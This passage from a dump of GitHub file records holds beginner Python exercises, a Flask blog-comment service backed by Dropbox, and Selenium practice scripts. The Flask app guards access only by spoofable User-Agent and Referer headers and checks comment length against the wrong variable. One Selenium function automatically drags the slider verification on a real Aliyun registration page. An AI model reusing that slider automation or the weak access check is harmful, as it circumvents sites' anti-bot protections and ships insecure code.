"749132276f55174c3160ba92052611e60860a5ce", "content_id": "6ca36f41d7d6138a620f93b3635c2a485dbe0b80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "no_license", "max_line_length": 130, "num_lines": 15, "path": "/generator.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 14:46:01 2018\n\n@author: Lenovo\n\"\"\"\nimport random\ndef generator():\n with open(\"fixed_two_2.txt\", \"r\") as f_20: \n word_22 = f_20.readlines()\n \n with open(\"fixed_three_2.txt\", \"r\") as f_32: \n word_32 = f_32.readlines()\n \n return word_22[random.randint(0,100)].strip()+ word_22[random.randint(0,100)].strip() + word_32[random.randint(0,100)].strip()" }, { "alpha_fraction": 0.7725118398666382, "alphanum_fraction": 0.7725118398666382, "avg_line_length": 22.55555534362793, "blob_id": "53178d9e5383ce0d75072837c0139b6b77636c78", "content_id": "0fd36a1318f9e2c8b5e685e6a623c8d40e6886fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 211, "license_type": "no_license", "max_line_length": 70, "num_lines": 9, "path": "/README.md", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "# ICS FINAL PROJECT\n\nThis is a multi-platform chatting machine using Python with GUI.\n\nThis is a project based on the initial code from Zhang Zheng, NYU Shanghai.\n\nThis is for testing Pycharm.\n\nThis for another test." } ]
5
ravgeetdhillon/komments
https://github.com/ravgeetdhillon/komments
0be1790c4b981e294c98ae46aecb1db7ae529766
1012e05e31260573c7a3dd0bec68dfb4c0797a43
2fa5868015fe2e1d5c086879839c7ba22c1b4540
refs/heads/master
2023-05-27T05:12:18.201891
2019-11-19T05:44:23
2019-11-19T05:44:23
214,606,420
3
0
null
2019-10-12T08:08:44
2022-06-10T12:00:00
2023-05-22T22:30:34
Python
[ { "alpha_fraction": 0.4516128897666931, "alphanum_fraction": 0.6774193644523621, "avg_line_length": 14.5, "blob_id": "fb5089af51ab017d31a1952c3d3caf35624a49a0", "content_id": "5419b3e6d9dc17c33d412cf568c7d8fea54198f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 62, "license_type": "no_license", "max_line_length": 16, "num_lines": 4, "path": "/requirements.txt", "repo_name": "ravgeetdhillon/komments", "src_encoding": "UTF-8", "text": "dropbox==9.4.0\nFlask==1.1.1\ngunicorn==19.9.0\nrequests==2.22.0\n" }, { "alpha_fraction": 0.7304104566574097, "alphanum_fraction": 0.7360074520111084, "avg_line_length": 40.230770111083984, "blob_id": "6ba06df8d1ecd48db73543f58342371f4c9c718d", "content_id": "420d3998bf8da945463b15afd2706ca88ded0160", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 180, "num_lines": 26, "path": "/README.md", "repo_name": "ravgeetdhillon/komments", "src_encoding": "UTF-8", "text": "## Komments\n\nA Flask Web App to manage comments for a blog.\n\n## Basics\n\n#### Installation\n\n1. Create a personal app in your Dropbox.\n2. Create an `ACCESS TOKEN` for your app. (Don't share it with anyone!)\n3. Clone this repository locally, install all the pip dependencies and adjust the `SITE_NAME` variable in the `app.py` file to your blog site.\n4. Deploy the web app on any Python hosting platform like Heroku.\n5. Create a `DROPBOX_ACCESS_TOKEN` environment key on your platform and add your Dropbox access token to this key.\n6. You are ready to go.\n\n#### Adding comments\n\nFrom your app, send a **POST** request to `<site.url>/add` URL with `name`, `content`, `blog` as parameters. The comments are saved to the `comments.json` file in your Dropbox app.\n\n#### Getting comments\n\nFrom your app, send a **POST** request to `<site.url>/get` URL with `blog` as a parameter. The comments are then fetched from the `comments.json` file in your Dropbox app.\n\n## Support\n\nIn case of any anomalies, please file an issue [here](https://github.com/ravgeetdhillon/komments/issues).\n" }, { "alpha_fraction": 0.5818815231323242, "alphanum_fraction": 0.5849990844726562, "avg_line_length": 28.797813415527344, "blob_id": "a9f7e0fb147d64c2be291af7c1c71ca971b6c9af", "content_id": "297adbd04895a86555e78d93ea72f1e44192a50c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5453, "license_type": "no_license", "max_line_length": 185, "num_lines": 183, "path": "/app.py", "repo_name": "ravgeetdhillon/komments", "src_encoding": "UTF-8", "text": "from flask import Flask, jsonify, request, escape, json, Response\nfrom datetime import datetime\nimport dropbox\nimport requests\nimport os\n\n\nSITE_NAME = '' # for example google.com\nDROPBOX_ACCESS_TOKEN = os.environ.get('DROPBOX_ACCESS_TOKEN')\nCOMMENTS_FILE = '/comments.json'\nCOMMENTS_BACKUP_FILE = f'/comments_backup_{datetime.now().isoformat()}.json'\n\n\ndef createRequest(url):\n r = requests.get(url)\n data = r.json()\n return data\n\n\ndef addComment(name, content, blog):\n return {\n 'name': name,\n 'content': content,\n 'blog': blog,\n 'time': datetime.now().isoformat(),\n }\n\n\ndef getTempLink(dbx):\n link = dbx.files_get_temporary_link(COMMENTS_FILE).link\n return link\n\n\ndef saveAndSendComments(dbx, comments):\n with open('comments_local.json', 'w', encoding='utf-8') as f:\n json.dump(comments, f, ensure_ascii=True, indent=2)\n\n with open('comments_local.json', 'rb') as f:\n dbx.files_upload(f=f.read(), path=COMMENTS_FILE, mode=dropbox.files.WriteMode.overwrite)\n return True\n\n\ndef sendResponse(data):\n return Response(\n json.dumps(data),\n mimetype=\"text/json\",\n headers = {\n \"Access-Control-Allow-Origin\":\"*\"\n }\n )\n\n\ndef allowAccess():\n useragent = request.headers.get('User-Agent')\n referer = request.headers.get('Referer')\n if ( useragent.lower().__contains__('mozilla') or useragent.lower().__contains__('chrome') or useragent.lower().__contains__('safari') ) and referer.lower().__contains__(SITE_NAME):\n return True\n\n\napp = Flask(__name__)\n\n\[email protected]('/', methods=['GET', 'POST'])\ndef index():\n return sendResponse( [request.headers.get('User-Agent'), request.headers.get('Referer'), 'hello.'] )\n\n\[email protected]('/get', methods=['POST'])\ndef get():\n errors = []\n\n if not( allowAccess() ):\n errors.append('Stricted Access only.')\n return sendResponse(errors)\n \n try:\n dbx = dropbox.Dropbox(DROPBOX_ACCESS_TOKEN)\n dbx.users_get_current_account()\n except:\n errors.append('No access allowed.')\n return sendResponse(errors)\n\n if request.method == 'POST':\n if 'blog' in request.form:\n blog = escape( request.form['blog'].strip() )\n try:\n float(blog)\n errors.append('Not a valid blog attribute.')\n except:\n pass\n else:\n errors.append('No blog attribute available.')\n \n if len(errors) != 0:\n return sendResponse(errors)\n \n link = getTempLink(dbx)\n all_comments = createRequest(link)\n final_comments = [comment for comment in all_comments if comment['blog'] == blog]\n final_comments = sorted(final_comments, key=lambda k: (k['time']), reverse=True)\n\n return sendResponse(final_comments)\n else:\n errors.append('Not a valid request method. Only POST is accepted.')\n \n return sendResponse(errors)\n\n\[email protected]('/add', methods=['POST'])\ndef add():\n errors = []\n\n if not( allowAccess() ):\n errors.append('Stricted Access only.')\n return sendResponse(errors)\n\n try:\n dbx = dropbox.Dropbox(DROPBOX_ACCESS_TOKEN)\n dbx.users_get_current_account()\n except:\n errors.append('No access allowed.')\n return sendResponse(errors)\n\n if request.method == 'POST':\n if 'name' in request.form:\n name = escape( request.form['name'].strip() )\n try:\n float(name)\n errors.append('Not a valid name attribute.')\n except:\n if len(name) > 20:\n errors.append('Maximum size for name is 20 chars.')\n else:\n errors.append('No name attribute available.')\n \n if 'content' in request.form:\n content = escape( request.form['content'].strip() )\n if len(name) > 500:\n errors.append('Maximum size for a comment is 500 chars.')\n else:\n errors.append('No content attribute available.')\n\n if 'blog' in request.form:\n blog = escape( request.form['blog'].strip() )\n try:\n float(blog)\n errors.append('Not a valid blog attribute.')\n except:\n pass\n else:\n errors.append('No blog attribute available.')\n\n if len(errors) != 0:\n return sendResponse(errors)\n\n link = getTempLink(dbx)\n all_comments = createRequest(link)\n all_comments.append( addComment(name, content, blog) )\n\n try:\n with open('comments_local.json', 'w', encoding='utf-8') as f:\n json.dump(all_comments, f, ensure_ascii=True, indent=2)\n\n with open('comments_local.json', 'rb') as f:\n dbx.files_upload(f=f.read(), path=COMMENTS_FILE, mode=dropbox.files.WriteMode.overwrite)\n except:\n errors.append('Comments could\\'nt be saved.')\n \n if len(errors) != 0:\n return sendResponse(errors)\n\n final_comments = [comment for comment in all_comments if comment['blog'] == blog]\n final_comments = sorted(final_comments, key=lambda k: (k['time']), reverse=True)\n\n return sendResponse(final_comments)\n else:\n errors.append('Not a valid request method. Only POST is accepted.')\n\n return sendResponse(errors)\n\n\nif __name__ == '__main__':\n app.run()\n" } ]
3
kahwasaurus/Factorial
https://github.com/kahwasaurus/Factorial
40f04ad51a973a68bc0b3f5f4aa74715041c5c66
af4ea4e67fc153beb6df80172dcc0915e17b59e3
89d0316bf132b05b9583f09cd97f59ed782ec6d9
refs/heads/master
2020-05-22T15:21:48.677781
2017-03-12T04:04:25
2017-03-12T04:04:25
84,698,530
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6978852152824402, "alphanum_fraction": 0.7160120606422424, "avg_line_length": 22.714284896850586, "blob_id": "c9da668e8e6a87176c8da33db1a393ca79351929", "content_id": "dd942f57d220879934ed85ac86bfedd66436a970", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 64, "num_lines": 14, "path": "/factorial.py", "repo_name": "kahwasaurus/Factorial", "src_encoding": "UTF-8", "text": "num = input(\"Enter a number to factorialize: \\n\")\nfactorial=1\nfor i in range(1,num+1):\n\tfactorial=factorial*i\nprint \"The factorial of\",num,\"is\",factorial\n\n\nusernum = input(\"Enter the number you want to factorialize: \\n\")\nfactorial = 1\ni = 1\nwhile(i<=num):\n\tfactorial = factorial*i\n\ti=i+1\nprint \"The factorial of\",num,\"is\",factorial" } ]
1
qianpeng-qp/pytest1
https://github.com/qianpeng-qp/pytest1
889b223542f22d6f2121bd12aa2ee770f9ef460d
6eb3007547ddeabed07b46cecaaffde9d8e32e64
1c4fc7a849df519615b3ae41b7578f1e9fb4fe0d
refs/heads/master
2021-01-06T10:44:16.612503
2020-03-03T13:39:34
2020-03-03T13:39:34
241,301,054
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6108949184417725, "alphanum_fraction": 0.6225680708885193, "avg_line_length": 22.170454025268555, "blob_id": "e138fbbc5a3cf3d5898bb3d2890918d0024d258d", "content_id": "56fe5d4a3274b34ad826a66e309383b8b2d8165a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2344, "license_type": "no_license", "max_line_length": 64, "num_lines": 88, "path": "/src/hanshu/hanshu.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''\nCreated on 2019年7月10日\n\n@author: asus\n'''\n# 定义函数\ndef greet_user():\n '''显示问候语''' #文档注释语\n print(\"hello\")\ngreet_user()\n\ndef greet_user1(name):\n print(name)\ngreet_user1(\"lili\")\ndef describe_dog(name,age):\n print(name+str(age))\ndescribe_dog(\"qqq\", 10)\ndescribe_dog(name=\"bbb\", age=20)#关键字实参,确保不会传错\n\ndef describe_cat(age,name=\"dd\"):# 注意将默认参数写后面\n print(name+str(age))\ndescribe_cat(age=20)\ndescribe_cat(15,\"ss\")\n\n#return 返回值\ndef get_name(first_name,last_name,middle_name=''): #中间名可以选择\n '''返回完整姓名'''\n full_name=first_name+middle_name+last_name\n return full_name.title()\nname=get_name(\"aaa\", \"bbb\")\nprint(name)\nname =get_name(\"111\", \"www\", \"sss\")\nprint(name)\n\n#返回字典\ndef build_person(first_name,last_name):\n person={'first':first_name,'last':last_name}\n return person\nperson = build_person(\"aaa\", \"bbb\")\nprint(person)\n\nwhile True:\n print(\"tell me name:\")\n f_name=input(\"f_name:\")\n if f_name =='q':\n break\n l_name=input(\"l_name:\")\n if l_name=='q':\n break\n name = build_person(f_name,l_name)\n print(name)\n #函数中修改列表\ndef print_modle(up_designs,com_modles): \n \"\"\"模拟打印每个设计,直到打印完成,打印完后移到com_modles\"\"\"\n while up_designs:\n com_design=up_designs.pop()\n print(\"print modle:\"+com_design)\n com_modles.append(com_design)\n print(up_designs)\ndef show_modle(com_modles):\n print(\"all:\")\n for modles in com_modles:\n print(modles)\nup_designs =['a','b','c']\ncom_modles=[]\nprint_modle(up_designs[:], com_modles) #禁止函数修改列表:\nshow_modle(com_modles)\n\n#传递任意数量的实参+位置实参\ndef make_pizza(size,*toppings):\n \"\"\"打印顾客所有配料+尺寸\"\"\"\n print(str(size))\n for topping in toppings:\n print(\"-\"+topping)\nmake_pizza(12,'aaa')\nmake_pizza(13,'bbbb','bbbb','ccc')\n\n#使用任意数量关键字实参\ndef build_pro(first,last,**user_info):\n \"\"\"创建字典,包含一切用户信息\"\"\"\n pro={}\n pro['first_name']=first\n pro['last_name']=last\n for key,value in user_info.items():\n pro[key] =value\n return pro\nuser_pro = build_pro('a','b',location='ccc',field='ddd')\nprint(user_pro)\n\n\n\n \n \n\n\n\n\n" }, { "alpha_fraction": 0.49125364422798157, "alphanum_fraction": 0.558309018611908, "avg_line_length": 16.149999618530273, "blob_id": "48ccaecb46ea6d46abd26a0a67484071316cc9c7", "content_id": "7799da2428b91f94aeeb5ae04649318f69000d3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 46, "num_lines": 40, "path": "/src/learn/day3_2.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def show1(**arg): # 字典\n print(arg, type(arg))\n\n\nshow1(n1=78)\n\n\ndef show2(*arg): # 元组\n print(arg, type(arg))\n\n\nshow2(78)\n\n\ndef show3(*args, **kwargs):\n print(args, type(args))\n print(kwargs, type(kwargs))\n\n\nshow3(11, 22, 33, 44, n=1, m=3)\nl = [11, 22, 33, 44]\nd = {'n': 1, 'm': 3}\nshow3(l, d) # l和d做为一个整体\nshow3(*l, **d) # 使用*区分,两*字典\n\ns1 = '{0} is {1}'\n# result = s1.format('alex','zb')\nl = ['alex', '2b']\nresult = s1.format(*l) # 使用*区分\nprint(result)\n\ns2 = '{name} is {acter}'\n# result = s2.format(name='alex', acter='sb')\nd = {'name': 'alex', 'acter': 'sb'}\nresult = s2.format(**d)\nprint(result)\n\nfunc = lambda a: a + 1 # 创建函数a,并函数内容a+1 并返回结果\nret = func(99)\nprint(ret)\n" }, { "alpha_fraction": 0.6465517282485962, "alphanum_fraction": 0.6482758522033691, "avg_line_length": 37.66666793823242, "blob_id": "2d7d9a24cdd0daffc44fdb9343c538e874174abd", "content_id": "20c27813d06b91f8a4c0788209ac502c495639a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 54, "num_lines": 15, "path": "/src/test_9_6/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class Restaurant ():\n \"\"\"开店店\"\"\"\n def __init__(self,restaurant_name,cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0\n def describe_restaurant(self):\n print(\"打印店名:\"+self.restaurant_name)\n def open_restaurant(self):\n print(\"开张:\"+self.cuisine_type)\n def set_namber_served(self,number):\n self.number_served=number\n print(\"number_served\"+str(self.number_served))\n def increment_number_served(self,devop_people):\n self.number_people += devop_people\n" }, { "alpha_fraction": 0.6747151613235474, "alphanum_fraction": 0.6893651485443115, "avg_line_length": 33.13888931274414, "blob_id": "231c764c8c0c4d21f0b773c554f7f63db0b8a284", "content_id": "df0f5c9150ccc461a500e55abb4aac0c985ec41b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3936, "license_type": "no_license", "max_line_length": 131, "num_lines": 108, "path": "/src/test/seleium_3.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndef yuansu():\n driver = webdriver.Chrome()\n driver.get('https://search.suning.com/iPhone%2011/')\n eles = driver.find_elements_by_css_selector('span.def-price')\n for i in eles:\n # 获取元素属性值\n sku = i.get_attribute('datasku')\n band_id = i.get_attribute('brand_id')\n color = i.value_of_css_property('color') #获取颜色\n print(sku,band_id)\n\n driver.get('https://www.baidu.com')\n name = driver.find_element_by_css_selector('#kw').get_property('name') #仅能获取name\n driver.find_element_by_class_name(\"s_ipt\").send_keys('苏宁')\n driver.find_element_by_class_name(\"s_ipt\").submit() #enter键\n print(name)\n\n\ndef iframe():\n driver = webdriver.Chrome()\n driver.get('https://login.anjuke.com/login/form')\n iframe = driver.find_element_by_id('iframeLoginIfm')\n driver.switch_to.frame(iframe)# 切换到iframe里\n driver.find_element_by_id('phoneIpt').send_keys('13020207396')\n driver.find_element_by_id('smsIpt').send_keys('123311')\n driver.switch_to.parent_frame() #返回上一层\n #driver.switch_to.default_content() #返回最外层\n driver.find_element_by_xpath('//a[contains(text(),\\'关于安居客\\')]').click()\n\ndef roll():\n driver = webdriver.Chrome()\n driver.get('https://account.aliyun.com/register/register.htm')\n ifram = driver.find_element_by_id('alibaba-register-box')\n driver.switch_to.frame(ifram)\n slides = driver.find_element_by_css_selector('div[id=\"nc_1__scale_text\"]')\n slides.location_once_scrolled_into_view #确认x,y完整\n print(slides.location)\n\n width = slides.value_of_css_property('width')\n width = int(width.split('px')[0]) #长度\n drag = driver.find_element_by_css_selector('span[id=\"nc_1_n1z\"]')\n print(\"width:\",width)\n # 在元素上按下鼠标左键,移动鼠标,释放鼠标,执行。\n ActionChains(driver).move_to_element(drag).click_and_hold().move_by_offset(width,0).release().perform()\n\n\ndef window():\n driver = webdriver.Chrome()\n # 最大化窗口\n driver.maximize_window()\n # 最小化\n driver.minimize_window()\n # 全屏\n driver.fullscreen_window()\n\n driver.get(\"https://www.baidu.com\")\n driver.find_element_by_css_selector('#kw').send_keys(\"helloworld\")\n driver.find_element_by_css_selector('#kw').submit()\n\n # 后退\n driver.back()\n # 前进\n driver.forward()\n # 刷新\n driver.refresh()\n\n # 退出\n driver.quit()\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nimport selenium.webdriver.support.expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\ndriver = webdriver.Chrome()\ndriver.maximize_window()\n# 设置页面加载时间\ndriver.set_page_load_timeout(30)\n# 全局等待某个元素显示出来\ndriver.implicitly_wait(20)\ndriver.get('https://www.juhe.cn/?')\nstart_time = time.perf_counter()\niframe1 = driver.find_element_by_css_selector('iframe[id=\"layui-layer-iframe1\"]')\ndriver.switch_to.frame(iframe1)\ntry:\n\n # ele = driver.find_element_by_css_selector('div.inputWrap > [id=\"mobilephone\"]')\n #EC.筛选出xx BY是获取元素\n ele= WebDriverWait(driver,15,0.1).until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.inputWrap > [id=\"mobilephone\"]')))\n ele.send_keys('12345')\nexcept NoSuchElementException as e:\n print(driver.page_source)\n print(e)\nfinally:\n driver.find_element_by_css_selector('div.inputWrap > [id=\"mobilephone\"]').send_keys('11111')\n\n pass\nend_time = time.perf_counter()\nprint(f\"查找元素一共使用 时间: {end_time-start_time}\")\n\n# ele = WebDriverWait(driver,6,0.3).until(lambda x:x.find_element_by_css_selector('div.inputWrap > [id=\"mobilephone\"]'))\n\n# ele.send_keys('1234')" }, { "alpha_fraction": 0.5854567885398865, "alphanum_fraction": 0.6028589010238647, "avg_line_length": 26.758621215820312, "blob_id": "0ab5f3c7d1094641c2d3da60f09682f457dea345", "content_id": "7a9ca0096a501fa32c855f0b21b29510ee118b8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1855, "license_type": "no_license", "max_line_length": 63, "num_lines": 58, "path": "/src/json_1/number_write1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import json\nnumbers = [2,3,4,5,11,13]\nfilename = 'number.json'\nwith open(filename, 'w') as f_obj:\n json.dump(numbers, f_obj) #json.dump 存储这组数字\n\nwith open(filename) as f_obj:\n numbers = json.load(f_obj) #json.load 将json存储到内存,可以使用\nprint(numbers)\n\n#如果已有用户名,则读取,否则写入\nfilename1 = 'username1.json'\n# username = input(\"输入姓名:\")\n# with open(filename1, 'w') as f_obj1: # 存储到json文件\n# json.dump(username, f_obj1)\n# print(\"remember:\"+username)\n# with open(filename1) as f_obj2: # 存储到内存并读取\n# username = json.load(f_obj2)\n# print(\" user_naem :\" + username)\ndef greet_user():\n \"\"\"问候用户并指出名字\"\"\"\n try:\n with open(filename1) as f_obj2: # 存储到内存并读取\n username = json.load(f_obj2)\n except FileNotFoundError:\n username = input(\"输入姓名:\")\n with open(filename1, 'w') as f_obj1: # 存储到json文件\n json.dump(username, f_obj1)\n print(\"remember:\"+username)\n else:\n print(\" user_naem :\" + username)\ngreet_user()\n\ndef get_stored_username():\n \"\"\"如果存储了姓名就打出\"\"\"\n try:\n with open(filename1) as f_obj2: # 存储到内存并读取\n username = json.load(f_obj2)\n except FileNotFoundError:\n return None\n else:\n return username\n\ndef get_new_username():\n \"\"\"提示输入新用户名\"\"\"\n username = input(\"输入姓名:\")\n with open(filename1, 'w') as f_obj1: # 存储到json文件\n json.dump(username, f_obj1)\n print(\"remember:\" + username)\n\ndef greet_user():\n \"\"\"问候用户并指出名字\"\"\"\n username = get_stored_username()\n if username:\n print(\"welcome\"+ username)\n else:\n username = get_new_username()\ngreet_user()" }, { "alpha_fraction": 0.548701822757721, "alphanum_fraction": 0.580287754535675, "avg_line_length": 20.069686889648438, "blob_id": "e2529ce4942da1bdcdc120dcae661e3be17e678f", "content_id": "d5d36b480dc91d769e74778d8ec8807009b20660", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6741, "license_type": "no_license", "max_line_length": 108, "num_lines": 287, "path": "/src/pydevtest.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "# from nt import remove\n# from audioop import reverse\nfrom idlelib.colorizer import color_config\n\nmessage = \"hello world\"\nprint(message)\nprint(message.title())\n# 首字母大写\nprint(message.upper() + \" \" + message.lower())\n# 大小写\nprint(\"\\t age \\n\")\n# t换行 \\n空格\nlanguage = ' python '\nprint(language.rstrip())\n# 去后面除空吧\nprint(language.lstrip())\n# 去前面除空吧\nprint(language.strip())\n# 去两端\nprint(1 + 2)\nage = 25\nmessage = \"happy\" + str(age) + \"day\"\n# int转string\nprint(message)\n\nshuzu = [1, 2, 3, 4, 'sajsdak']\nprint(shuzu)\nprint(shuzu[4])\n\nprint(language + shuzu[4].title())\n\nshuzu[2] = 'saj ajsd'\nprint(shuzu[2])\n# 修改\n\nshuzu.append('jskal ;')\n# appened 末尾添加\nprint(shuzu)\n\nprint(shuzu.index(4))\n\nshuzu.insert(1, 'klasd')\nprint(shuzu)\n# insert 从xx位置添加\n\ndel shuzu[0]\n# 删除XX位置\nprint(shuzu)\n\npop = shuzu.pop(2) # 删除末尾\nprint(shuzu)\nprint(pop)\n\nshuzu.remove(2) # 删除值\nprint(shuzu)\n\nshuzu.insert(3, 'ttt')\na = 'ttt'\nprint(shuzu)\nshuzu.remove(a)\nprint(shuzu)\n\nshuzu[1] = 'waas'\nshuzu.sort() # 永久性排序\nprint(shuzu)\nshuzu.sort(reverse=True) # 倒叙永久\nprint(shuzu)\n\nprint(shuzu.count('4'))\n\n# 函数sorted\nprint(sorted(shuzu)) # 非永久正序 \n\nshuzu.reverse() # 倒着打印\nprint(shuzu)\nprint(len(shuzu)) # 数组长度\n\n# for循环-----------------------------------------------------------------------------\nfor shu in shuzu: # 定义shu 打印数组 循环\n print(\"lalalal\\t\" + shu.title())\nprint(\"hello world\")\n\n# unexpected indent 不必要的缩进 expected an indented block 应要缩进\n\nfor value in range(1, 5): # range生产数字 1到4 不会包含5\n print(value)\nnumber = list(range(1, 5)) # list 数字转换列表\nprint(number)\neven_number = list(range(1, 10, 2)) # range 指定步长\nprint(even_number)\n\nsquare = []\nfor value in range(1, 5):\n square = value ** 2 # ** 平方\n print(square)\nsquare1 = []\nfor value in range(1, 5):\n # square1 = value**2\n square1.append(value ** 2)\nprint(square1)\n\nprint(min(square1) + max(square1) + sum(square1))\n\nsquare2 = [value ** 2 for value in range(1, 5)] # 缩写\nprint(square2)\n\nnumber1 = [value for value in range(1, 5)]\nprint(sum(number1))\n\nprint(square2[0:3]) # 切片 0到3位\nprint(square)\nprint(square2[:3])\n\n# 遍历\nfor value in square2[0:2]:\n print(value)\n\nsquare3 = square2[:]\nprint(square3)\nsquare2.append(29)\nsquare3.append(22)\nprint(square2)\nprint(square3)\n\nnumber2 = (1, 2)\n# number2[0] = 3 报错 无法修改元组的值\nprint(number2[0])\nprint(number2[1])\n\nnumber2 = (3, 4) # 再次赋值\nprint(number2[0])\nprint(number2[1])\n\n# tuple(number) 元组转列表\n\n# if语句------------------------------------------------------------------------------\nprint(square1)\nfor value in square1:\n if value == 4: # == 为相等 !=为不等\n print(value)\n else:\n print(\"ll\")\nfor value in square1:\n if value >= 9 and value <= 10: # and 为并列 or为或者\n print(value)\n else:\n print(0)\nif 5 not in square1: # not in 特定值不在数组中\n print(\"shi\")\nprint((3, 4) == number2) # 打印布尔类型 number2 =(3,4)\n\nnumber = 19\nif number >= 18:\n print(\"大于18\")\nelif number == 18:\n print(\"等于18\") # elif 多个使用,可以省略else\nelse:\n print(\"小于18\")\n\nif 4 in square1:\n print(\"ye\") # if 可以多个使用\nif 9 in square1:\n print(\"o ye\")\n\nif 4 in square1:\n print(\"不打印9\")\nelif 9 in square1: # if通过不运行elif\n print(\"o ye\")\n\nfor value in square1:\n if value == 9:\n print(\"打酒\") # 检查特殊元素\n else:\n print(value)\nsquare = [1, 2]\nif square:\n print(\"非空\")\nelse:\n print(\"空\")\nfor value in square:\n if value in square1: # 判断数组1的值在数组2中么\n print(\"有\")\n else:\n print(\"空\")\n# 字典值-------------------------------------------------------------------------------\ndog_0 = {'color': 'black', 'points': 1} # {} 键值\nprint(dog_0['color'])\nprint(dog_0['points'])\nprint(\"打印\" + dog_0['color']) # str和int不能相加\nprint(\"打印\" + str(dog_0['points'])) # 强制转换\nprint(dog_0)\ndog_0['name'] = 'tt' # 添加键值\ndog_0['age'] = 'dd'\nprint(dog_0)\n\ndog_1 = {}\ndog_1['color'] = 'red'\ndog_1['age'] = 2\nprint(dog_1)\ndog_1['color'] = 'green'\nprint(dog_1)\n# 键值的更新\nalien_0 = {'x_position': 0, 'y_position': 0, 'speed': 'medium'}\nprint(\"初始位置:\" + str(alien_0['x_position']))\nif alien_0['speed'] == 'slow':\n x_increment = 1\nelif alien_0['speed'] == 'medium':\n x_increment = 2\nelse:\n x_increment = 3\nalien_0['x_position'] = alien_0['x_position'] + x_increment\nprint(\"此时位置:\" + str(alien_0['x_position']))\n\n# del必须指定字典名和要删除的键名\ndel dog_0['color']\nprint(dog_0)\n# 遍历所有的键-值对\nfavorite_language = {\n 'jen': 'python',\n 'mike': 'java',\n 'phil': 'c',\n 'tom': 'python',\n}\nprint(\"jen \\t\" + favorite_language['jen'])\nfor name, language in favorite_language.items(): # items 返回一个键和一个值\n print(\"name:\" + name + \"languare :\" + language)\n\nfor name in favorite_language.keys(): # 获取所有的键, 可以去除keys 输出不变\n print(name)\nfriends = ['tom', 'mike']\nfor name in favorite_language.keys():\n if name in friends:\n print(name + \"\\t\" + language)\n\n# 按顺序遍历所有值\nfor name in sorted(favorite_language, reverse=False):\n print(name)\n# 遍历字典中的所有值 valus(),set去重\nfor language in set(favorite_language.values()):\n print(language)\ndog_2 = {'coloe': 'black', 'age': 2}\ndogs = [dog_0, dog_1, dog_2]\nfor dog in dogs:\n print(dog)\n\ndogs = []\nfor dog_nymber in range(30): # 创建30个字典\n new_dog = {'color': 'red', 'age': 3}\n dogs.append(new_dog)\nprint(str(len(dogs))) # 打印30个\nfor dog in dogs[0:3]:\n if dog['color'] == 'red':\n dog['color'] = 'yellow' # 增加键和值\n dog['speed'] = 'medium'\nfor dog in dogs[:5]: # 打印前5个\n print(dog)\n# 字典中存储列表\nfavorite_language = {\n 'jen': ['python', 'ruby'],\n 'mike': 'java',\n 'phil': ['c', 'java'],\n 'tom': ['python', 'haskill']\n}\nfor name, language in favorite_language.items():\n print(name.title() + ':')\n for language_1 in language:\n print(language_1.title())\n\nusers = {\n 'user1': {\n 'name': 'alien',\n 'age': 4,\n 'location': 'aaa'\n },\n 'user2': {\n 'name': 'blown',\n 'age': 5,\n 'location': 'bbb'\n },\n 'user3': {\n 'name': 'mike',\n 'age': 6,\n 'location': 'ccc'\n }\n}\nfor user_name, users_info in users.items():\n print('name:' + user_name + '\\t age:' + str(users_info['age']) + '\\tlocation:' + users_info['location'])\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7753846049308777, "avg_line_length": 39.6875, "blob_id": "ade1a4774318792044104d25606b6f8bd98022b7", "content_id": "58ca2381447a600c1fd84778d074b60e963a0644", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "no_license", "max_line_length": 114, "num_lines": 16, "path": "/src/test/test/weibo.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport time\n\nfrom selenium.webdriver.support.wait import WebDriverWait\nimport selenium.webdriver.support.expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\ndriver = 